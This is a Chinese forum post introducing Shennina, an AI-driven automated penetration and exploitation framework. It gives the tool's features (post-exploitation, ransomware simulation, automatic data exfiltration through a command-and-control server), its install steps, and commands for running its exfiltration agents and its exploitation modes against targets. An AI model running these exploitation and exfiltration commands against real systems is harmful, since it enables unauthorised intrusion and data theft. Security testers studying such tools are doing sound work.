51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 1398|回复: 0
打印 上一主题 下一主题

[原创] Shennina一款自动化主机渗透工具

[复制链接]
  • TA的每日心情
    擦汗
    昨天 09:02
  • 签到天数: 1042 天

    连续签到: 4 天

    [LV.10]测试总司令

    跳转到指定楼层
    1#
    发表于 2022-12-29 10:07:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    关于Shennina
      Shennina是一款功能强大的自动化主机渗透/漏洞利用框架,该项目的主要目的是使用人工智能技术来实现安全扫描、漏洞扫描/分析和漏洞利用开发的完全自动化。Shennina整合了Metasploit和Nmap这两款强大的网络安全工具实现其部分功能,并执行渗透测试。除此之外,该工具还整合了一个命令控制服务器用于从目标主机中自动过滤数据。
      该项目的开发理念取自于Isao Takaesu的DeepExploit项目,并由Mazin Ahmed和Khalid Farah在HITB CyberWeek 2019人工智能挑战赛中首次面世。
      工具运行机制
      Shennina能够扫描一组输入目标以获得相关的可用网络服务,然后使用其人工智能引擎识别可用的渗透测试方案,并自动提供相对应的漏洞利用技术,最后该工具会自动针对目标尝试进行渗透测试。如果渗透测试成功,那么Shennina将会自动进入后渗透工作阶段。
      该工具的人工智能引擎最初使用的是实时活动目标进行训练的,以学习和训练出针对远程服务的可靠渗透技术。
      值得一提的是,Shennina还支持“启发式”模式来识别目标漏洞并提供相对应的漏洞利用方案。
      功能介绍
      1、实现了自动化自我学习方法来查找漏洞利用方案;
      2、使用了托管并发设计实现高性能运行;
      3、智能集群渗透测试/漏洞利用;
      4、后渗透功能;
      5、欺骗攻击检测;
      6、勒索软件模拟功能;
      7、自动数据过滤;
      8、可选的漏洞扫描模式;
      9、启发式模式获取推荐的渗透测试方案;
      10、支持WindowsLinux和macOS代理;
      11、后渗透阶段脚本化的攻击/渗透模式;
      12、提供针对内核的漏洞利用/渗透解决方案建议;
      13、针对漏洞利用方案提供带外技术测试;
      14、自动过滤目标服务器中的重要数据;
      15、报告生成;
      16、覆盖了 MITRE ATT&CK框架中的40+ TTP;
      17、支持多个输入目标。
      工具下载
      由于该工具基于Python开发,因此我们首先需要在本地设备上安装并配置好Python环境。接下来,我们就可以使用下列命令将该项目源码克隆至本地:
      git clone https://github.com/mazen160/shennina.git

      然后使用pip命令和项目提供的requirements.txt文件来安装该工具所需的依赖组件:
      cd Shennina
      pip install requirements.txt


      除此之外,我们也可以直接访问该项目的【Release页面】来下载工具最新的发布版本。
      工具运行
      过滤服务器-代理
      Linux/macOS
      ./exfiltration-server/agent.sh

      Windows
      ./exfiltration-server/agent.ps1

      过滤服务器-运行
      $ cd ./exfiltration-server/
      $ ./run-server.sh


      MSFRPCD服务器
      ./scripts/run-msfrp.py

      运行服务扫描
      $ ./shennina.py --lhost metasploit-ip --target target.local --service-scan-only

      以训练模式运行Shennina
      $ ./shennina.py --training-mode --lhost lhost.local --target training-target.local

      渗透测试模式
      $ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode

      渗透测试模式-启发式
      $ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode --secondary-mode


    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏
    回复

    使用道具 举报

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

    GMT+8, 2024-11-8 12:11 , Processed in 0.061842 second(s), 23 queries .

    Powered by Discuz! X3.2

    © 2001-2024 Comsenz Inc.

    快速回复 返回顶部 返回列表